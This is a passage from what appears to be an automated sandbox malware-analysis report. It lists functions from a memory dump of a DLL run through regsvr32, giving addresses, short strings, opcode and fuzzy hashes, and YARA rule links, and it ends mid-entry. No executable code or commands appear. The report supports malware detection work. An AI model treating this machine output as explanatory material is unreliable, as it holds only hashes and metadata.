                                    • Opcode ID: b07007c7df8fdcff1a3a12132ff18166943f80f753e521aa0974c7cb649c130d
                                    • Instruction ID: 6e752a1dbd70b7d88cda0fb1d20915d08c65693f2945daa64a17bfbf07288bfe
                                    • Opcode Fuzzy Hash: b07007c7df8fdcff1a3a12132ff18166943f80f753e521aa0974c7cb649c130d
                                    • Instruction Fuzzy Hash: 5E21AEB55187848B83489F28C44A41ABBE0FB8C70DF504B2DF8DAA6260D778D646CB4B
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000000018001586C Relevance: 2.6, Strings: 2, Instructions: 61COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 0F6 $KO
                                    • API String ID: 0-276686719
                                    • Opcode ID: 6205ceb11bb6b662748add8c297f1b443fa17d6724776aa75fc58f5dae511f0b
                                    • Instruction ID: 15a0bfab9284e0424f8d805b4637dfad6d31782236c6d70db9798c35a47a8228
                                    • Opcode Fuzzy Hash: 6205ceb11bb6b662748add8c297f1b443fa17d6724776aa75fc58f5dae511f0b
                                    • Instruction Fuzzy Hash: AB21AD755283808FC368DF68C58614BBBF0FB86748F504A1DFAC686261D7B6D805CB47
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00000001800226E0 Relevance: 2.6, Strings: 2, Instructions: 55COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: p$tSA
                                    • API String ID: 0-3551818358
                                    • Opcode ID: 99011765d78b2b4d15352d42fcf875ddc55d3d35c100f7abdde6317782da955f
                                    • Instruction ID: dafa682f426fd7c4027cc0dc28289443c8a7082daafb3c1476061bf3b97c4e55
                                    • Opcode Fuzzy Hash: 99011765d78b2b4d15352d42fcf875ddc55d3d35c100f7abdde6317782da955f
                                    • Instruction Fuzzy Hash: 4A2169B45183858BD788DF28C54A50BBBE0BBCD74CF400B2DF4CAA6260D378D644CB4A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180017BA8 Relevance: 2.5, Strings: 2, Instructions: 45COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 8r.F$P?
                                    • API String ID: 0-1060054278
                                    • Opcode ID: 69901aac6ce1aef3d4959f7919bc5ecc16501e8ce7d01dbb2ce958a2c67dc727
                                    • Instruction ID: b2da1e8a0f89ffdbcd525e428a91df6a678b185604bab408c7dee67f2374b2b0
                                    • Opcode Fuzzy Hash: 69901aac6ce1aef3d4959f7919bc5ecc16501e8ce7d01dbb2ce958a2c67dc727
                                    • Instruction Fuzzy Hash: DC2179B45187849BC749DF68D44A41ABBE0BB9C71CF800B5DF4CAAA310D3B8D645CB4A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000000018002490C Relevance: 1.8, Strings: 1, Instructions: 516COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: <>
                                    • API String ID: 0-1927776135
                                    • Opcode ID: 37c3f39876e999beb0937df684067ca5812f0cda9578e561258942df6de8421c
                                    • Instruction ID: 9b9c084f2c1b1f08cb5858c99f1f27cbdd47ca95557f3058ff07422eb4e47033
                                    • Opcode Fuzzy Hash: 37c3f39876e999beb0937df684067ca5812f0cda9578e561258942df6de8421c
                                    • Instruction Fuzzy Hash: F742047190438C9BDBB9CFA8D8CA6DD7BB0FB58314F20421DD80A9B261DB745A85CF85
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180023DDC Relevance: 1.5, Strings: 1, Instructions: 283COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: j=
                                    • API String ID: 0-592141216
                                    • Opcode ID: 1169f1869d3fb428bfdad968f94ee3f32c89471e58a558a0d80dd63f76afa428
                                    • Instruction ID: 9003355423bafd58b5275d98cfc2247977288ca0e37ad1cbcdd73f3390e5cf1b
                                    • Opcode Fuzzy Hash: 1169f1869d3fb428bfdad968f94ee3f32c89471e58a558a0d80dd63f76afa428
                                    • Instruction Fuzzy Hash: 6BD1397150074D8BDF89DF28C89A6DE3BA0FB58398F55522CFC4AA6250C778D998CBC4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000000018001ABE8 Relevance: 1.5, Strings: 1, Instructions: 247COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: !O
                                    • API String ID: 0-2378650393
                                    • Opcode ID: 302dfdcfbb7bb296299c3bc274bc73d8feb87790668f515a7c841834ed93dc2b
                                    • Instruction ID: 4170ec84c9d3f49002394f5178db7bb3edfe66952fd3c2890134f0e6da5031b0
                                    • Opcode Fuzzy Hash: 302dfdcfbb7bb296299c3bc274bc73d8feb87790668f515a7c841834ed93dc2b
                                    • Instruction Fuzzy Hash: F2E10A711087C88BDBFADF64C88ABDE3BACFB44748F105519EA0A9E258CB745748CB01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000000018001100C Relevance: 1.5, Strings: 1, Instructions: 222COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: ^Lu
                                    • API String ID: 0-3854589714
                                    • Opcode ID: fb3768cccb7a26f6a89fbcd18e8308750f02c0f1f73e9d8b382492f454794486
                                    • Instruction ID: 7c859a126a25bd0c02bef77f14247f717a5a9adcaacfb9e6f8c6730b8303fd88
                                    • Opcode Fuzzy Hash: fb3768cccb7a26f6a89fbcd18e8308750f02c0f1f73e9d8b382492f454794486
                                    • Instruction Fuzzy Hash: E4A128709047498FCB9DCF68C88A6EEBBF1FF48384F204119EA46A7250D7759A85CB81
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180007634 Relevance: 1.4, Strings: 1, Instructions: 183COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: Z"
                                    • API String ID: 0-1896177830
                                    • Opcode ID: 85f6676341921d6f483625aa17b45c04f6466e2be55beb334fa49e51010a1540
                                    • Instruction ID: 91163448777d7afc4cc80e296cb9cfbd8772b1902329242c75d45222aab24025
                                    • Opcode Fuzzy Hash: 85f6676341921d6f483625aa17b45c04f6466e2be55beb334fa49e51010a1540
                                    • Instruction Fuzzy Hash: C0A165B590060DCFCBA8CF78D15A68E7BF1BB04308F606129EC269A262E774D619CF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180028394 Relevance: 1.4, Strings: 1, Instructions: 179COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: e8f2
                                    • API String ID: 0-4239716772
                                    • Opcode ID: 3907476c53bac25a555e3ffc467f8b6ad850bf32927a98fe31c8bf9de770097f
                                    • Instruction ID: aaec5001b0b3f576b33a9a86a913a78c3f9fdfa8ed470970e8cb6047951b043a
                                    • Opcode Fuzzy Hash: 3907476c53bac25a555e3ffc467f8b6ad850bf32927a98fe31c8bf9de770097f
                                    • Instruction Fuzzy Hash: C491C37010078E8BDF49DF24D89A5DA3BA1FB58348F114618FC5A97294C7B8EA65CBC4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180004264 Relevance: 1.4, Strings: 1, Instructions: 159COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: Qhm
                                    • API String ID: 0-202924511
                                    • Opcode ID: a2bb8b1411107b7575902c6661116fd2ce5bfac275bcbff6451e16fcd58631a3
                                    • Instruction ID: dff427aa29f5729145b0ab8b996757c093157db28b416262619acb8c77b37c14
                                    • Opcode Fuzzy Hash: a2bb8b1411107b7575902c6661116fd2ce5bfac275bcbff6451e16fcd58631a3
                                    • Instruction Fuzzy Hash: 1D511479517209CBCB69CF38D4D56E93BE0EF68344F20012DFC668B2A2DB70D5268B48
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000000018000796C Relevance: 1.4, Strings: 1, Instructions: 154COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: WZ'
                                    • API String ID: 0-1944904082
                                    • Opcode ID: 8b55f411d49b287bdfafef9dc47725f2bb274e5ab4be629ead2bc2b735d307b3
                                    • Instruction ID: 5b5aaaf1f09ca5557c90149fa64bb16396cbc43774f49a57b3b09e68a9cf408c
                                    • Opcode Fuzzy Hash: 8b55f411d49b287bdfafef9dc47725f2bb274e5ab4be629ead2bc2b735d307b3
                                    • Instruction Fuzzy Hash: F171087155878CDBDBBADF28C8897D937B1FB98304F908219D80E8E254DB785B4ACB41
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000000018001303C Relevance: 1.4, Strings: 1, Instructions: 142COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: -]
                                    • API String ID: 0-3195032325
                                    • Opcode ID: 2f387ab0a9f756c6099ceefcc45306d74e879ef7c324eb87884d154b92a960fc
                                    • Instruction ID: 01c3c27378e714c100c9a801295078fc99e5b088b1ed4129002e73aaaa485763
                                    • Opcode Fuzzy Hash: 2f387ab0a9f756c6099ceefcc45306d74e879ef7c324eb87884d154b92a960fc
                                    • Instruction Fuzzy Hash: 0151297010064D8BCB49DF28D4855D93FE1FB0C3ACF1A6318FD4AAA251D774D989CB88
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180018DBC Relevance: 1.4, Strings: 1, Instructions: 141COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: }4}
                                    • API String ID: 0-922147943
                                    • Opcode ID: 13f685bfa53c13813d4a1c5d0eb0e1f62a0b1129b8c138172dc2148ffb4c9b25
                                    • Instruction ID: d7790a4c64fa8f9a696ea70ce14f4ff71b76161c227bc6b72ade158e86aff98b
                                    • Opcode Fuzzy Hash: 13f685bfa53c13813d4a1c5d0eb0e1f62a0b1129b8c138172dc2148ffb4c9b25
                                    • Instruction Fuzzy Hash: 3461F2B090075D8FCF48DFA4C88A5EEBBB0FB18348F114219E849B6250D7789A09CF95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000000018000F2DC Relevance: 1.4, Strings: 1, Instructions: 136COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: J_H
                                    • API String ID: 0-3345504573
                                    • Opcode ID: 917d428dc0055415592351f28073fdc95282f2729562562c1ca0dc8b4505919e
                                    • Instruction ID: 228b1474463df3943694e07488ce24e2c321c70e95dbe7fca5aca48057557888
                                    • Opcode Fuzzy Hash: 917d428dc0055415592351f28073fdc95282f2729562562c1ca0dc8b4505919e
                                    • Instruction Fuzzy Hash: EE71E3B1904789CBDBB9DFA4C8896DDBBB0FB48344F20421EDC5AAB251DBB45685CF01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180007F74 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 6p
                                    • API String ID: 0-4149211260
                                    • Opcode ID: 2ce6c019f8e175d8f04f96ba0abbac2df009c59e7d0a66d8d52c33c4e2d2dbc2
                                    • Instruction ID: 4bbd446beaef8e149afb4be24994101fb76057089ac3c5e28d57a25dd33f9813
                                    • Opcode Fuzzy Hash: 2ce6c019f8e175d8f04f96ba0abbac2df009c59e7d0a66d8d52c33c4e2d2dbc2
                                    • Instruction Fuzzy Hash: 5D512670D0470E8FDBA5CFA4C4863EEBBF0FB58344F208519E155B6251C7789A498BD6
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180019900 Relevance: 1.4, Strings: 1, Instructions: 120COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: o-b
                                    • API String ID: 0-1062997908
                                    • Opcode ID: 576a5f5008345344db0b8e3d8b9e4c65842e933aac756182c5b50859cc037c1c
                                    • Instruction ID: 42124e7df8dcd8895505725edc86312d8ed31e4959f5f45477de907a66349d68
                                    • Opcode Fuzzy Hash: 576a5f5008345344db0b8e3d8b9e4c65842e933aac756182c5b50859cc037c1c
                                    • Instruction Fuzzy Hash: 5951177050064D8BDB94DF58C48A6DE3BE0FB28398F254219FC4AA6250D7789699CBC5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180008534 Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: >(O
                                    • API String ID: 0-1787487011
                                    • Opcode ID: b44782859c9866ecf0a367f2980fc160796e99ead2e04d39a5c7d0e6a088d4a1
                                    • Instruction ID: 047403745ffdf525a43130cb5f0cbada7355141308e198c8a6f422d75d1d2ed5
                                    • Opcode Fuzzy Hash: b44782859c9866ecf0a367f2980fc160796e99ead2e04d39a5c7d0e6a088d4a1
                                    • Instruction Fuzzy Hash: FB51D0B090078A8BCF4CDF64C8964EE7BB1FB48344F418A1DE966A6350D3B49665CFD4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00000001800254E4 Relevance: 1.4, Strings: 1, Instructions: 110COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 8:*
                                    • API String ID: 0-724269717
                                    • Opcode ID: e3fa9c188720ae3383b8778e69c2785bb5a3de525a41bd4bbc95f284b45543ac
                                    • Instruction ID: 711009871b2250b35f00fe0553413368f045348530dbac453829dc2cbdd56c12
                                    • Opcode Fuzzy Hash: e3fa9c188720ae3383b8778e69c2785bb5a3de525a41bd4bbc95f284b45543ac
                                    • Instruction Fuzzy Hash: DE519FB491074A8FCF48CF68D48A4DEBFB0FB68398F604519EC56AA250D37496A4CFD4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180001B8C Relevance: 1.4, Strings: 1, Instructions: 101COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: rX
                                    • API String ID: 0-981687150
                                    • Opcode ID: 72326b85271c7a937057e165988be4f12753e05fcac8eb4b8ea4e21389b64c69
                                    • Instruction ID: b6d69565f821f61997a80366e3bba675c41573294b632c1fc230c031640afc4a
                                    • Opcode Fuzzy Hash: 72326b85271c7a937057e165988be4f12753e05fcac8eb4b8ea4e21389b64c69
                                    • Instruction Fuzzy Hash: 4151AFB090034E9FCB88CF64D48A5DE7FF0FB68398F204619E856A6250D7B496A5CFC5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000000018002A6BC Relevance: 1.3, Strings: 1, Instructions: 97COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: Mf_
                                    • API String ID: 0-1332758469
                                    • Opcode ID: fb88f28924fad9aaa6151cff677ca0e0efdf4f904b7a048c95071875f4937966
                                    • Instruction ID: 588ebf95624ee4adfb38f08f1f8e1a2e631849e2b9196c961bccb52f3d8eb30d
                                    • Opcode Fuzzy Hash: fb88f28924fad9aaa6151cff677ca0e0efdf4f904b7a048c95071875f4937966
                                    • Instruction Fuzzy Hash: 72413A7051034E8BDB49DF24C88A6DE3FA0FB28388F254619FC4AA6250D774DA99CBC5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00000001800010E8 Relevance: 1.3, Strings: 1, Instructions: 97COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: #X
                                    • API String ID: 0-1684620495
                                    • Opcode ID: 95d6dfd1a906a0706b046fd694ee3460552bea9bfe9cb5e2a40ac0cd4b690da8
                                    • Instruction ID: f9643209bdbdb1888c2e59a9774da8228396ec72f530c9748c2220c9be6d5877
                                    • Opcode Fuzzy Hash: 95d6dfd1a906a0706b046fd694ee3460552bea9bfe9cb5e2a40ac0cd4b690da8
                                    • Instruction Fuzzy Hash: BC41B2B050C3858BC368DF69D49A51BFFF0FB8A344F104A1DF68686660D7B6D985CB06
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000000018002A0F8 Relevance: 1.3, Strings: 1, Instructions: 97COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: *ZP
                                    • API String ID: 0-3785686542
                                    • Opcode ID: 124ec41d44a3523d05a66609c609173a78c4b3624f4a4e6496b4e9e6556fc9cc
                                    • Instruction ID: cd700ac0e72fdea100a6c678007ea8a5747de393b09cc95ae15ed8a735d2c9a6
                                    • Opcode Fuzzy Hash: 124ec41d44a3523d05a66609c609173a78c4b3624f4a4e6496b4e9e6556fc9cc
                                    • Instruction Fuzzy Hash: C351A3B490038EDFCB89CF64D88A5CE7BB0FB14358F104A19F826A6260D7B49665CF95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000000018000FE08 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: m9
                                    • API String ID: 0-3356931199
                                    • Opcode ID: 59db1ee33f63e0a2717973542dec2f5b5e1c1c898ff6bc1b3de0a09d2022d082
                                    • Instruction ID: d52339509a2a8a66acc38e501e73e88f1da459d23edb33c529fdb618239225c9
                                    • Opcode Fuzzy Hash: 59db1ee33f63e0a2717973542dec2f5b5e1c1c898ff6bc1b3de0a09d2022d082
                                    • Instruction Fuzzy Hash: AC41DFB091074E8BDB48CF68C48A5DE7FF0FB58388F24821DE816A6250D3B496A4CFD5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180029F5C Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 4pI
                                    • API String ID: 0-4229698716
                                    • Opcode ID: 2de104f479e2b2f02d24493f8855e4bc5dcdc9c63e6a51756a92895ab6f7f3eb
                                    • Instruction ID: 0770ca01e568b3f0bfe5184ab77212d0ab800e579d58ef6f76929ab8cb5ebb0d
                                    • Opcode Fuzzy Hash: 2de104f479e2b2f02d24493f8855e4bc5dcdc9c63e6a51756a92895ab6f7f3eb
                                    • Instruction Fuzzy Hash: 2741F4B190074E8BCF48CFA8C89A5DE7FB0FB58358F10561DE826A6250D3B49658CF95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000000018000BC70 Relevance: 1.3, Strings: 1, Instructions: 92COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: T7
                                    • API String ID: 0-2187045315
                                    • Opcode ID: 5b373cdcbe2aa1956c24a8ef4c3b2010382917b3ef4417ae897a4905ea2e7e5d
                                    • Instruction ID: e445a35d468e15d444dcf9e81ad6d1cbfbebd9662ebae466ae50992912f39bd9
                                    • Opcode Fuzzy Hash: 5b373cdcbe2aa1956c24a8ef4c3b2010382917b3ef4417ae897a4905ea2e7e5d
                                    • Instruction Fuzzy Hash: 6B41E3B191074A8BCF48CF68C48A4DE7FB0FF68398F214609E856A6250D3B496A5CFD5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000000018002143C Relevance: 1.3, Strings: 1, Instructions: 90COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: Y[
                                    • API String ID: 0-1945238269
                                    • Opcode ID: 31c1f4254bc290cabebbeaadf273c7758becd057e90036f86d7834daa6438d30
                                    • Instruction ID: 277041adf1a083522e20f1ff56a0db14356653c4c70dd43ccf4c86f47916e8c3
                                    • Opcode Fuzzy Hash: 31c1f4254bc290cabebbeaadf273c7758becd057e90036f86d7834daa6438d30
                                    • Instruction Fuzzy Hash: C941E67091038E8FCB48DF68C88A5DE7BB1FB58358F10461DEC6AAB250D3B49664CF95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180029DF0 Relevance: 1.3, Strings: 1, Instructions: 84COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: [
                                    • API String ID: 0-784033777
                                    • Opcode ID: 593e2affadbd7d43363044155888d79a97a338ed63d972069ddab33477027861
                                    • Instruction ID: 430e1a122fe0b20a7e1e6f195b5c5d6ab4e3c741a825a8fe397d5d7cdac5a180
                                    • Opcode Fuzzy Hash: 593e2affadbd7d43363044155888d79a97a338ed63d972069ddab33477027861
                                    • Instruction Fuzzy Hash: 2841E4B090074E8BCB48CF64C89A4EE7FF1FB68358F11461DE856A6250D3B496A5CFC5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000000018000B948 Relevance: 1.3, Strings: 1, Instructions: 84COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 9 m
                                    • API String ID: 0-1920745034
                                    • Opcode ID: 403251bbe0303adcdb9fc718cab8a153fac6736b8b0f21ecfcc0465734d374f6
                                    • Instruction ID: 3be0e43e89224af25a3a96d245761afcbfad2e5132df1735d4859c98edb6e384
                                    • Opcode Fuzzy Hash: 403251bbe0303adcdb9fc718cab8a153fac6736b8b0f21ecfcc0465734d374f6
                                    • Instruction Fuzzy Hash: 5D41A6B180038ECFCB48CF68C88A5DE7FB1FB58358F114A19F869A6210D7B49665CF95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180003840 Relevance: 1.3, Strings: 1, Instructions: 82COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: wo0
                                    • API String ID: 0-1782833155
